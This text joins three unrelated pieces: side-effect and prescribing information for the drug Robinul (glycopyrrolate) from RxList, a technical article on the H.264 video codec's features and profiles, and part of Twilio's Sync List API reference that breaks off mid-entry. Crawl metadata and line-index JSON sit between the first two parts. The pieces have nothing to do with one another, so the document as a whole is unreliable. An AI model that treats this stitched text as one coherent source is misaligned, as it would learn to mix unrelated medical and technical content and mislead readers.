Tell your doctor immediately if any of these unlikely but serious side effects occur: decreased sweating, dry/hot/flushed skin, fast/irregular heartbeat, mental/mood changes (such as confusion, hallucinations, agitation, nervousness, unusual excitement), eye pain, vision changes, difficulty urinating, decreased sexual ability.
A very serious allergic reaction to this drug is rare. However, seek immediate medical attention if you notice any symptoms of a serious allergic reaction, including: rash, itching/swelling (especially of the face/tongue/throat), severe dizziness, trouble breathing.
This is not a complete list of possible side effects. If you notice other effects not listed above, contact your doctor or pharmacist.
In the US -
Call your doctor for medical advice about side effects. You may report side effects to FDA at 1-800-FDA-1088.
In Canada - Call your doctor for medical advice about side effects. You may report side effects to Health Canada at 1-866-234-2345.
Read the entire patient information overview for Robinul (Glycopyrrolate)»
What is Prescribing information?
The FDA package insert formatted in easy-to-find categories for health professionals and clinicians.
Robinul FDA Prescribing Information: Side Effects
(Adverse Reactions)
SIDE EFFECTS
Anticholinergics, including Robinul Injection (glycopyrrolate) , can produce certain effects, most of which are extensions of their pharmacologic actions. Adverse reactions may include xerostomia (dry mouth); urinary hesitancy and retention; blurred vision and photophobia due to mydriasis (dilation of the pupil); cycloplegia; increased ocular tension; tachycardia; palpitation; decreased sweating; loss of taste; headache; nervousness; drowsiness; weakness; dizziness; insomnia; nausea; vomiting; impotence; suppression of lactation; constipation; bloated feeling; severe allergic reactions including anaphylactic/anaphylactoid reactions; hypersensitivity; urticaria, pruritus, dry skin, and other dermal manifestations; some degree of mental confusion and/or excitement, especially in elderly persons.
In addition, the following adverse events have been reported from post-marketing experience with Robinul (glycopyrrolate) : malignant hyperthermia; cardiac arrhythmias (including bradycardia, ventricular tachycardia, ventricular fibrillation); cardiac arrest; hypertension; hypotension; seizures; and respiratory arrest. Post-marketing reports have included cases of heart block and QTc interval prolongation associated with the combined use of glycopyrrolate and an anticholinesterase. Injection site reactions including pruritus, edema, erythema, and pain have also been reported.
Robinul (glycopyrrolate) is chemically a quaternary ammonium compound; hence, its passage across lipid membranes, such as the blood-brain barrier is limited in contrast to atropine sulfate and scopolamine hydrobromide. For this reason the occurrence of CNS-related side effects is lower, in comparison to their incidence following administration of anticholinergics which are chemically tertiary amines that can cross this barrier readily.
Read the entire FDA prescribing information for Robinul (Glycopyrrolate) »
A A A
Robinul - User Reviews
Robinul User Reviews
Now you can gain knowledge and insight about a drug treatment with Patient Discussions.
Here is a collection of user reviews for the medication Robinul sorted by most helpful. Patient Discussions FAQs
Report Problems to the Food and Drug Administration
You are encouraged to report negative side effects of prescription drugs to the FDA. Visit the FDA MedWatch website or call 1-800-FDA-1088.
Women's Health
Find out what women really need.
|
{
"url": "http://www.rxlist.com/robinul-side-effects-drug-center.htm",
"source_domain": "www.rxlist.com",
"snapshot_id": "crawl=CC-MAIN-2014-35",
"warc_metadata": {
"Content-Length": "78612",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:NPFCIKTDUXRT2Q7HJ4BEZK3KDAKX2BB3",
"WARC-Concurrent-To": "<urn:uuid:51fa907c-4d04-4ff7-8531-4389183d7401>",
"WARC-Date": "2014-08-22T04:03:13Z",
"WARC-IP-Address": "23.62.6.185",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:DMRAFFWD7KLILZ4K6A2QRUEHWPKZIDUS",
"WARC-Record-ID": "<urn:uuid:8634f58f-b8e2-4c1d-b296-ce811e87424d>",
"WARC-Target-URI": "http://www.rxlist.com/robinul-side-effects-drug-center.htm",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:5c0b9cda-3b09-4181-b894-395be03d0809>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-180-136-8.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-35\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for August 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
30,
31,
39,
40,
284,
285,
293,
294,
322,
323,
365,
366,
868,
869,
1398,
1399,
1582,
1583,
1759,
1760,
1799,
1800,
1919,
1920,
1974,
1975,
2134,
2135,
2233,
2234,
2293,
2357,
2394,
2504,
2586,
2587,
2626,
2627,
2642,
2656,
2679,
2711,
2762,
2763,
2939,
2940,
3014,
3015,
3053,
3054,
3135,
3136,
3189,
3190,
3405,
3406,
3624,
3625,
3822,
3823,
4043,
4044,
4373,
4374,
4641,
4642,
4777,
4778,
4790,
4791,
4901,
4902,
5034,
5035,
5110,
5111,
5144,
5145,
5246,
5247,
5297,
5317,
5318,
5331,
5332,
6137,
6138,
6721,
6722,
7162,
7163,
7238,
7239,
7245,
7246,
7269,
7270,
7291,
7292,
7380,
7381,
7494,
7495,
7547,
7548,
7550,
7551,
7691,
7692,
7693,
7708,
7709
],
"line_end_idx": [
30,
31,
39,
40,
284,
285,
293,
294,
322,
323,
365,
366,
868,
869,
1398,
1399,
1582,
1583,
1759,
1760,
1799,
1800,
1919,
1920,
1974,
1975,
2134,
2135,
2233,
2234,
2293,
2357,
2394,
2504,
2586,
2587,
2626,
2627,
2642,
2656,
2679,
2711,
2762,
2763,
2939,
2940,
3014,
3015,
3053,
3054,
3135,
3136,
3189,
3190,
3405,
3406,
3624,
3625,
3822,
3823,
4043,
4044,
4373,
4374,
4641,
4642,
4777,
4778,
4790,
4791,
4901,
4902,
5034,
5035,
5110,
5111,
5144,
5145,
5246,
5247,
5297,
5317,
5318,
5331,
5332,
6137,
6138,
6721,
6722,
7162,
7163,
7238,
7239,
7245,
7246,
7269,
7270,
7291,
7292,
7380,
7381,
7494,
7495,
7547,
7548,
7550,
7551,
7691,
7692,
7693,
7708,
7709,
7741
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 7741,
"ccnet_original_nlines": 112,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 2,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.26837971806526184,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.020699499174952507,
"rps_doc_frac_lines_end_with_ellipsis": 0.008849560283124447,
"rps_doc_frac_no_alph_words": 0.21627408266067505,
"rps_doc_frac_unique_words": 0.43119266629219055,
"rps_doc_mean_word_length": 5.766055107116699,
"rps_doc_num_sentences": 60,
"rps_doc_symbol_to_word_ratio": 0.0007137799984775484,
"rps_doc_unigram_entropy": 5.551636695861816,
"rps_doc_word_count": 1090,
"rps_doc_frac_chars_dupe_10grams": 0.09673827141523361,
"rps_doc_frac_chars_dupe_5grams": 0.10946697741746902,
"rps_doc_frac_chars_dupe_6grams": 0.10946697741746902,
"rps_doc_frac_chars_dupe_7grams": 0.100556880235672,
"rps_doc_frac_chars_dupe_8grams": 0.09673827141523361,
"rps_doc_frac_chars_dupe_9grams": 0.09673827141523361,
"rps_doc_frac_chars_top_2gram": 0.04550516977906227,
"rps_doc_frac_chars_top_3gram": 0.011137629859149456,
"rps_doc_frac_chars_top_4gram": 0.010819409973919392,
"rps_doc_books_importance": -546.8133544921875,
"rps_doc_books_importance_length_correction": -546.8133544921875,
"rps_doc_openwebtext_importance": -305.77587890625,
"rps_doc_openwebtext_importance_length_correction": -305.77587890625,
"rps_doc_wikipedia_importance": -228.83888244628906,
"rps_doc_wikipedia_importance_length_correction": -228.83888244628906
},
"fasttext": {
"dclm": 0.021172229200601578,
"english": 0.8723433613777161,
"fineweb_edu_approx": 1.9424506425857544,
"eai_general_math": 0.0017045099521055818,
"eai_open_web_math": 0.15372085571289062,
"eai_web_code": 0.00014031000318937004
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.19",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "616.9",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
5,596,532,338,175,329,000
|
Why the Buzz About H.264?
H.264 Technology: It’s the bitrate!
H.264 is getting so much attention because it can encode video with approximately 3 times fewer bits than comparable MPEG-2 encoders.
Because H.264 is up to twice as efficient as MPEG-4 Part 2 (natural video) encoding, it has recently been welcomed into the MPEG-4 standard as Part 10 – Advanced Video Coding. Many established encoder and decoder vendors are moving directly to h.264 and skipping the intermediate step of MPEG-4 Part 2.
H.264 TechnologyGoals & Approach of H.264
The International Telecommunications Union (ITU) initiated the h.26L (for long term) effort in 1998 as a continuation of work following the MPEG-2 and h.263 standards. The overriding goal was to achieve a factor-of-2 reduction in bit rate compared to any competing standard.
Recall that MPEG-2 was optimized with specific focus on Standard and High Definition digital television services, which are delivered via circuit-switched head-end networks to dedicated satellite uplinks, cable infrastructure or terrestrial facilities. MPEG2’s ability to cope is being strained as the range of delivery media expands to include heterogeneous mobile networks, packet-switched IP networks, and multiple storage formats, and as the variety of services grows to include multimedia messaging, security, increased use of HDTV, and others. Thus, a second goal for h.264 was to accommodate a wider variety of bandwidth requirements, picture formats, and unfriendly network environments that throw high jitter, packet loss, and bandwidth instability into the mix.
The h.264 approach is a strictly evolutionary extension of the block-based encoding approach so well established in the MPEG and ITU standards. Key steps include:
• Use of Motion Estimation to support Inter-picture prediction for eliminating temporal redundancies
• Use of spatial correlation of data to provide Intra-picture prediction.
• Construction of residuals as the difference between predicted images and source images.
• Use of a discrete spatial transform and filtering to eliminate spatial redundancies in the residuals.
• Entropy coding of the transformed residual coefficients and of the supporting data such as motion vectors.
Major Features of H.264
Improved Inter-Prediction and Motion Estimation
First recall the limitations of motion estimation in MPEG-2, which searches reference pictures for a 16×16 set of pixels that closely matches the current macro block. The matching set of pixels must be completely within the reference picture. In contrast, H.264 provides:
• Fine-grained motion estimation. Temporal search seeks matching sub-macro blocks of variable size as small as 4×4, and finds the motion vector to _ pel resolution. Searches may also identify motion vectors associated with matching sub-macro blocks of 4×8, 8×4, 8×8, 8×16, 16×8, or the full 16×16. [In future, even finer 1/8 pel resolution will be supported.]
• Multiple reference frames. H.264 provides additional flexibility for frames to point to more than multiple frames – which may be any combination of past and future frames. This capability provides opportunities for more precise inter-prediction, but also improved robustness to lost picture data.
• Unrestricted motion search . Motion search allows for reference frames that may be partly outside the picture; missing data can be spatially predicted from boundary data. Users may choose to disable this feature by specifying a Restricted Motion search.
• Motion vector prediction. Where sufficient temporal correlation exists, motion vectors may be accurately predicted and only their residuals transmitted explicitly in the bitstream.
Such techniques not only provide for more accurate inter-prediction, but also help to partition and scale the bitstream with priority given to data that is more globally applicable. Thus, they not only improve compression but also resilience to errors and network instabilities.
Motion Compensation Accuracy
Improved Intra Spatial Prediction and Transform
Because “intra prediction” is concerned with only one picture at a time, it relies upon spatial rather than temporal correlations. As the algorithm works through a picture’s macro blocks in raster scan order, earlier results may be used to “predict” the downstream calculations. Then we need only transmit residuals as refinements to the predicted results.
H.264 performs intra prediction in the spatial domain (prior to the transform, and it is a key part of the approach. Even for an intra-picture, every block of data is predicted from its neighbors before being transformed and coefficients generated for inclusion in the bitstream.
• Coarse versus fine intra prediction. Intra prediction may be performed either on 4×4 blocks, or 16×16 macro blocks. The latter is more efficient for uniform areas of a picture.
• Direction Dependent Intra Modes. By doing intra prediction in the spatial domain (rather than in the transform domain), h.264 can employ prediction that is direction dependent, and thus can focus on the most highly correlated neighbors. For Intra 16×16 coding and Intra 4 x 4 coding, there are 9 and 4 directional modes, respectively.
• 4×4 transform of Residual Data. For initially supported profiles, residual data transforms are always performed for 4×4 blocks of data, and coefficients transmitted on this fine-grained basis.
• Variable block sizes for spatial transform*. Future profiles will allow transform of variable size blocks (4×8, 8×8, etc.) with the same level of flexibility as motion estimation blocks. This will provide more flexibility and further reduction of bitrate.
• Integer transforms. Efficiency in both computation and bitrate is gained by implementing the traditional Discrete Cosine Transform (DCT) as an integer transform that requires no multiplications, except for a single normalization. It can also be inverted exactly without mismatch.
• Deblocking filter. To eliminate fine structure blockiness that might be aggravated by the smaller transform blocks, a context-sensitive deblocking filter smoothes out the internal edges. Its filter strength depends upon the prediction modes and relationship between the neighboring blocks. In addition to increasing signal-to-noise ratio (S/N), this technique significantly improves the subjective quality of the image for a given S/N.
Improved Algorithms for Encoding
Two alternative methods improve efficiency of the entropy coding process by selecting variable length codes depending upon context of the data being encoded.
• Context-Adaptive Variable Length Coding (CAVLC) employs multiple variable length codeword tables to encode transform coefficients, which consume the bulk of bandwidth. Based upon a priori statistics of already processed data, the best table is selected adaptively. For non-coefficient data, a simpler scheme is used that relies upon only a single table.
• Context-Adaptive Binary Arithmetic Coding (CABAC*) provides an extremely efficient encoding scheme when it is known that certain symbols are much more likely than others. Such dominant symbols may be encoded with extremely small bit/symbol ratios. The CABAC method continually updates frequency statistics of the incoming data and adaptively adjusts the algorithm in real-time. This method is an advanced option available in profiles beyond the baseline profile.
Techniques for Mitigation of Errors, Packet Losses, and Network Variability
Error containment and scalability
H.264 includes several other features that are useful in containing the impact of errors, and in enabling the use of scalable or multiple bit streams:
• Slice coding. Each picture is subdivided into one or more slices. The slice is given increased importance in H.264 as the basic spatial segment that is independent from its neighbors. Thus, errors or missing data from one slice cannot propagate to any other slice within the picture. This also increases flexibility to extend picture types (I, P, B) down to the level of “slice types.” Redundant slices are permitted.
• Data partitioning is supported to allow higher priority data (e.g., sequence headers) to be separated from lower priority data (e.g., B-picture transform coefficients).
• Flexible macro block ordering (FMO) can be used to scatter the bits associated with adjoining macro blocks more randomly throughout the bit stream. This reduces the chance that a packet loss will affect a large region and enables error concealment by ensuring that neighboring macro blocks will be available for prediction of a missing macro block.
• The Multiple Reference Frames that are used for improved motion estimation also allow for partial motion compensation for a P picture when one of its referenced frames is missing or corrupted.
SI and SP Pictures (or slices)*
MPEG-2 practice is to insert intra pictures (I) at regular intervals to contain errors that otherwise could propagate through the picture sequence indefinitely. In addition, intra-pictures provide a means for random access or fast-forward actions, because intra frames do not require any knowledge of other referenced frames. Similarly, regular I pictures would be necessary to switch promptly from between higher and lower bitrate streams – an important feature for accommodating the bandwidth variability in mobile networks. However, I pictures typically require far more bits than P pictures and thus are an inefficient means for addressing these two requirements.
H.264 introduces two new slice types, “Switching I Pictures” (SI) and “Switching P Pictures” (SP), which help address these needs with significantly reduced bit rate. Identical SP frames can be obtained even though different reference frames are used – thus, they can be substituted for I frames as temporal resynchronization points, but with significantly reduced bitrate. SP pictures rely upon the transformation and quantization of predicted inter blocks. Because SP pictures do not take full advantage of intra-prediction, at the cost of some bits they can be extended to SI pictures which do so.
Note that because slices are coded independently, switching slices (SI or SP) can be defined at that level.
Low Latency Feature
Arbitrary Slice Ordering (ASO) relaxes the constraint that all macro blocks must be sequenced in decoding order, and thus enhances flexibility for low-delay performance important in teleconferencing, surveillance and interactive Internet applications.
Simplified Profiles
H.264 is completely focused on efficient coding of natural video and does not directly address the object-oriented functionality, synthetic video, and other systems functionality in MPEG-4, which carries a very complex structure of over 50 profiles.
In contrast, H.264 is initially defined with only three profiles:
• Baseline Profile. A basic goal of H.264 was to provide a royalty-free baseline profile to encourage early application of the standard. The baseline profile consists most of the major features described above, with the exception of: B slices and weighted prediction; CABAC encoding; field coding; and SP & SI slices. Thus, the baseline profile is appropriate for many progressive scan applications such as video conferencing and video-over-IP, but not for interlaced television or multiple stream applications.
• Main Profile. Main profile contains all of the features in Baseline, except flexible macro block ordering (FMO), arbitrary slice order (ASO) and redundant slices. However, it adds field coding, B slices and weighted prediction, and CABAC entropy coding. This profile is appropriate for efficient coding of interlaced television applications where bit or packet error is not excessive, and where low latency is not a requirement.
• Extended Profile. This profile contains all features from the baseline profile and main profiles, except that CABAC is not supported. In addition, the Extended profile adds SP and SI for stream switching, and up to 8 slice groups. This profile is appropriate for server-based streaming applications where bit-rate scalability and error rate is very important. Security Applications and Mobile video services would be an example.
Where will H.264 have the biggest impact?
Any video application can benefit from a reduction in bandwidth requirements, but highest impact will involve applications where such reduction relieves a hard technical constraint, or which makes more cost-effective use of bandwidth as a limiting resource.
In addition, other h.264 features such error containment, error concealment, and efficient bitstream switching is especially useful for IP and wireless environments.
Squeeze More Services into a Broadcast Channel
Reduction in bandwidth requirements by factors of 2-3 provide cost savings for bandwidth-constrained services such as satellite and DVB-Terrestrial, or alternatively allow such providers to expand services at reduced incremental cost.
Facilitate High Quality Video Streaming over IP Networks
H.264 can produce very good quality, TV Quality streaming at less than 1Mbps (standard definition). This slips under 1 Mbps thresholds for xDSL and thus opens possibilities for new access methods for high quality, larger format video.
High Definition Transmission and Storage
Recall that MPEG-2 consumes 15-20 Mbps for High Definition video at suitable quality for broadcast or DVD. Use of h.264 will bring this down to about 8 Mbps, making it possible for bandwidth-strapped satellite service providers to fit 4 HD channels per QPSK channel.
Even more significant is that this reduction enables burning one HD movie onto a conventional DVD, thus avoiding the need for the industry to adapt a higher density (“blue laser”) DVD format.
Mobile Video Applications
3G Mobile networks present an unusual array of technical challenges that have driven many features in h.264. Applications include video conferencing, streaming video on demand, multimedia-messaging services, and low resolution broadcast. Some key issues, and h.264 tools for dealing with them, include:
• Low bandwidth (50 – 300 kbps) is the key issue. The expected trend is for 3G deployment to start with h.263 and move up to h.264 as it matures. An industry analyst points out “… 3G networks are only likely to offer 57.6kbit/s initially. As those bit rates increase, mobiles and networks will move to the new H.264 codec, which offers twice the performance of H.263. This should result in the same picture quality being achieved at half the bit rate.”
• Small devices with many formats; variability of available bandwidth. For streaming applications, these two separate issues can be addressed by providing multiple streams with different formats and bandwidths, and selecting the appropriate stream at run-time. H.264’s SP and SI pictures facilitate dynamic switching among multiple streams to accommodate bandwidth variability.
• High bit error rates, packet losses, and latency. For video applications, retransmissions are impractical for dropped or delayed packets, so h.264 provides several means (e.g., FMO, data partitioning, etc.) to contain error impacts and facilitate error concealment.
What is the relationship to MPEG-4 and MPEG-2?
Compared to MPEG-2
H.264 employs the same general approach as MPEG 1 & 2 as well as the h.261 and h.263 standards, but adds many incremental improvements to obtain coding efficiency improvement of about a factor-of-3.
MPEG-2 was optimized with specific focus on Standard and High Definition digital television services, which are delivered via circuit-switched head-end networks to dedicated satellite uplinks, cable infrastructure or terrestrial facilities. MPEG2’s ability to cope is being strained as the range of delivery media expands to include heterogeneous mobile networks, packet-switched IP networks, and multiple storage formats, and as the variety of services grows to include multimedia messaging, increased use of HDTV, and others. Thus, a second goal for h.264 was to accommodate a wider variety of bandwidth requirements, picture formats, and unfriendly network environments that throw high jitter, packet loss, and bandwidth instability into the mix.
Compared to MPEG-4
During 2002, the h.264 Video Coding Experts Group combined forces with MPEG4 experts to form the Joint Video Team (JVT), so H.264 is being published as MPEG-4 Part 10 (Advanced Video Coding).
MPEG-4 is really a family of standards whose overall theme is object-oriented multimedia applications. It thus has much broader scope than H.264, which is strictly focused on more efficient and robust video coding. The comparable part of MPEG-4 is Part 2 Visual (sometimes called “Natural Video”). Other parts of MPEG address scene composition, object description and java representation of behavior, animation of human body and facial movements, audio and systems.
MPEG-4
|
{
"url": "http://njsolutions.net/why-the-buzz-about-h-264/",
"source_domain": "njsolutions.net",
"snapshot_id": "crawl=CC-MAIN-2020-10",
"warc_metadata": {
"Content-Length": "78423",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:YEQUK7JKIO7JHUOKTDZPSJJC2MXXW22E",
"WARC-Concurrent-To": "<urn:uuid:958329b0-5068-4e1b-8fc0-c83499acf755>",
"WARC-Date": "2020-02-17T14:18:26Z",
"WARC-IP-Address": "74.208.54.138",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:VEMUBDP6IPZNSML7BZJHE3NUCDDTXFFR",
"WARC-Record-ID": "<urn:uuid:d1bb0af2-4021-4787-8ff2-30e44a4e7bb4>",
"WARC-Target-URI": "http://njsolutions.net/why-the-buzz-about-h-264/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:77c00b04-61af-49b8-baf8-ccfc736444fd>"
},
"warc_info": "isPartOf: CC-MAIN-2020-10\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for February 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-15.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
26,
27,
63,
64,
198,
199,
502,
503,
545,
820,
821,
1593,
1594,
1757,
1758,
1861,
1937,
2029,
2135,
2246,
2247,
2271,
2272,
2320,
2592,
2593,
2955,
3256,
3514,
3699,
3700,
3979,
3980,
4009,
4010,
4058,
4415,
4416,
4696,
4697,
4878,
5217,
5414,
5674,
5958,
6398,
6399,
6432,
6590,
6591,
6949,
7416,
7417,
7493,
7494,
7528,
7679,
7680,
8102,
8275,
8628,
8825,
8826,
8858,
9526,
9527,
10128,
10129,
10237,
10238,
10258,
10510,
10511,
10531,
10781,
10782,
10848,
10849,
11363,
11796,
12229,
12230,
12272,
12530,
12531,
12697,
12698,
12745,
12980,
12981,
13038,
13273,
13274,
13315,
13582,
13583,
13775,
13776,
13802,
14105,
14106,
14561,
14941,
15211,
15212,
15259,
15260,
15279,
15478,
15479,
16229,
16230,
16249,
16441,
16442,
16908,
16909
],
"line_end_idx": [
26,
27,
63,
64,
198,
199,
502,
503,
545,
820,
821,
1593,
1594,
1757,
1758,
1861,
1937,
2029,
2135,
2246,
2247,
2271,
2272,
2320,
2592,
2593,
2955,
3256,
3514,
3699,
3700,
3979,
3980,
4009,
4010,
4058,
4415,
4416,
4696,
4697,
4878,
5217,
5414,
5674,
5958,
6398,
6399,
6432,
6590,
6591,
6949,
7416,
7417,
7493,
7494,
7528,
7679,
7680,
8102,
8275,
8628,
8825,
8826,
8858,
9526,
9527,
10128,
10129,
10237,
10238,
10258,
10510,
10511,
10531,
10781,
10782,
10848,
10849,
11363,
11796,
12229,
12230,
12272,
12530,
12531,
12697,
12698,
12745,
12980,
12981,
13038,
13273,
13274,
13315,
13582,
13583,
13775,
13776,
13802,
14105,
14106,
14561,
14941,
15211,
15212,
15259,
15260,
15279,
15478,
15479,
16229,
16230,
16249,
16441,
16442,
16908,
16909,
16915
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 16915,
"ccnet_original_nlines": 117,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.31757187843322754,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.037699680775403976,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1974440962076187,
"rps_doc_frac_unique_words": 0.3256826400756836,
"rps_doc_mean_word_length": 5.4748711585998535,
"rps_doc_num_sentences": 178,
"rps_doc_symbol_to_word_ratio": 0.0003194900054950267,
"rps_doc_unigram_entropy": 5.932345390319824,
"rps_doc_word_count": 2527,
"rps_doc_frac_chars_dupe_10grams": 0.09020599722862244,
"rps_doc_frac_chars_dupe_5grams": 0.107119619846344,
"rps_doc_frac_chars_dupe_6grams": 0.094976507127285,
"rps_doc_frac_chars_dupe_7grams": 0.09020599722862244,
"rps_doc_frac_chars_dupe_8grams": 0.09020599722862244,
"rps_doc_frac_chars_dupe_9grams": 0.09020599722862244,
"rps_doc_frac_chars_top_2gram": 0.003975419793277979,
"rps_doc_frac_chars_top_3gram": 0.005204190034419298,
"rps_doc_frac_chars_top_4gram": 0.004987350199371576,
"rps_doc_books_importance": -1137.49853515625,
"rps_doc_books_importance_length_correction": -1137.49853515625,
"rps_doc_openwebtext_importance": -754.9716796875,
"rps_doc_openwebtext_importance_length_correction": -754.9716796875,
"rps_doc_wikipedia_importance": -568.7099609375,
"rps_doc_wikipedia_importance_length_correction": -568.7099609375
},
"fasttext": {
"dclm": 0.02925807051360607,
"english": 0.9068413972854614,
"fineweb_edu_approx": 2.094297409057617,
"eai_general_math": 0.8254798054695129,
"eai_open_web_math": 0.35442054271698,
"eai_web_code": 0.47342681884765625
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.0151",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "621.392",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
1,968,103,603,735,985,000
|
Sync List Resource - Twilio
Menu
Expand
Rate this page:
Thanks for rating this page!
We are always striving to improve our documentation quality, and your feedback is valuable to us. How could this documentation serve you better?
List Resource
A Sync List is an ordered collection of individual items, each storing separate JSON objects.
After you create a List, use the ListItem resource to add, retrieve, update, and delete items from your List. See that page for more details on how items are stored in lists, including ordering, expiration, and limitations on each item's size.
List properties
Names in REST API format
sid
sid<ES> Not PII
The unique string that we created to identify the Sync List resource.
unique_name
An application-defined string that uniquely identifies the resource. It can be used in place of the resource's sid in the URL to address the resource.
account_sid
sid<AC> Not PII
The SID of the Account that created the Sync List resource.
service_sid
sid<IS> Not PII
The SID of the Sync Service the resource is associated with.
url
url Not PII
The absolute URL of the Sync List resource.
links
uri_map Not PII
The URLs of the Sync List's nested resources.
revision
string Not PII
The current revision of the Sync List, represented as a string.
date_expires
date_time<iso8601> Not PII
The date and time in GMT when the Sync List expires and will be deleted, specified in ISO 8601 format. If the Sync List does not expire, this value is null. The Sync List might not be deleted immediately after it expires.
date_created
date_time<iso8601> Not PII
The date and time in GMT when the resource was created specified in ISO 8601 format.
date_updated
date_time<iso8601> Not PII
The date and time in GMT when the resource was last updated specified in ISO 8601 format.
created_by
The identity of the Sync List's creator. If the Sync List is created from the client SDK, the value matches the Access Token's identity field. If the Sync List was created from the REST API, the value is system.
Create a List resource
post
https://sync.twilio.com/v1/Services/{ServiceSid}/Lists
Parameters
Names in REST API format
service_sid
Path
post sid_like<IS> Not PII
The SID of the Sync Service to create the new Sync List in.
unique_name
Optional
post string PII MTL: 30 DAYS
An application-defined string that uniquely identifies the resource. This value must be unique within its Service and it can be up to 320 characters long. The unique_name value can be used as an alternative to the sid in the URL path to address the resource.
ttl
Optional
post integer Not PII
Alias for collection_ttl. If both are provided, this value is ignored.
collection_ttl
Optional
post integer Not PII
How long, in seconds, before the Sync List expires (time-to-live) and is deleted. Can be an integer from 0 to 31,536,000 (1 year). The default value is 0, which means the Sync List does not expire. The Sync List will be deleted automatically after it expires, but there can be a delay between the expiration time and the resources's deletion.
Example
Fetch a List resource
get
https://sync.twilio.com/v1/Services/{ServiceSid}/Lists/{Sid}
Parameters
Names in REST API format
service_sid
Path
get sid_like<IS> Not PII
The SID of the Sync Service with the Sync List resource to fetch.
sid
Path
get sid_like<ES> Not PII
The SID of the Sync List resource to fetch.
Example
Read a List resource
get
https://sync.twilio.com/v1/Services/{ServiceSid}/Lists
Parameters
Names in REST API format
service_sid
Path
